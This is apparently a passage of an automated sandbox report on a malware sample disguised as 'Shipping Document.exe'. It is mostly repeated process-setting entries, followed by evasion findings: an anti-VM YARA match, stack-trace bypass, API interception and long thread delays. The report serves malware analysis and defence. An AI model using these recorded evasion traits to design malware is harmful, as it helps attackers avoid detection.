                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Shipping Document.exe PID: 7076, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: KOENBvWt.exe PID: 1260, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: 4700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: 4E40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: 5E40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: 5F70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: 6F70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: B470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: C470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: C900000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: D900000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: 1150000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: 4B90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: 52A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: 62A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: 63D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: 73D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: B770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: C770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory allocated: CC00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0114096E rdtsc 10_2_0114096E
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239852Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239735Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239622Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239516Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239391Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239274Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239172Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239053Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238938Jump to behavior
